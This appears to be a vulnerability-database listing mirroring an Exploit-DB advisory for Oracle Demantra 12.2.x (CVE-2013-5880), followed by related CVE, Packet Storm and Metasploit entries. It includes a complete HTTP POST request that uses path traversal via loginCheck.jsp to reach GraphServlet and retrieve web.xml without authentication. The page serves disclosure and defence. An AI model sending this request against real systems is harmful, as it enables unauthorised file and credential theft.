Lucene search
OracleEDB-ID:39018HistoryJan 14, 2014 - 12:00 a.m.
Oracle Supply Chain Products Suite - Remote Security
2014-01-1400:00:00
Oracle
www.exploit-db.com
20
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/64836/info
Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.
The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.
Attackers can exploit this issue to obtain sensitive information.
This vulnerability affects the following supported versions:
12.2.0, 12.2.1, 12.2.2
POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xmlRelated
cvelist
cvelist
CVE-2013-5880
2014-01-15 00:30:00
packetstorm
packetstorm
Oracle Demantra 12.2.1 Authentication Bypass
2014-03-02 00:00:00
Oracle Demantra Arbitrary File Retrieval With Authentication Bypass
2024-09-01 00:00:00
Oracle Demantra Database Credentials Leak
2024-09-01 00:00:00
nvd
nvd
CVE-2013-5880
2014-01-15 16:11:05
CVE-2014-5880
2014-03-27 18:55:06
cve
cve
CVE-2013-5880
2014-01-15 16:11:05
CVE-2014-5880
2014-03-27 18:55:06
prion
prion
Buffer overflow
2014-01-15 16:11:00
Design/Logic Flaw
2014-03-27 18:55:00
metasploit
metasploit
Oracle Demantra Database Credentials Leak
2014-04-07 18:42:47
Oracle Demantra Arbitrary File Retrieval with Authentication Bypass
2014-03-27 04:53:12
securityvulns
securityvulns
oracle
oracle
Oracle Critical Patch Update - January 2014
2014-01-14 00:00:00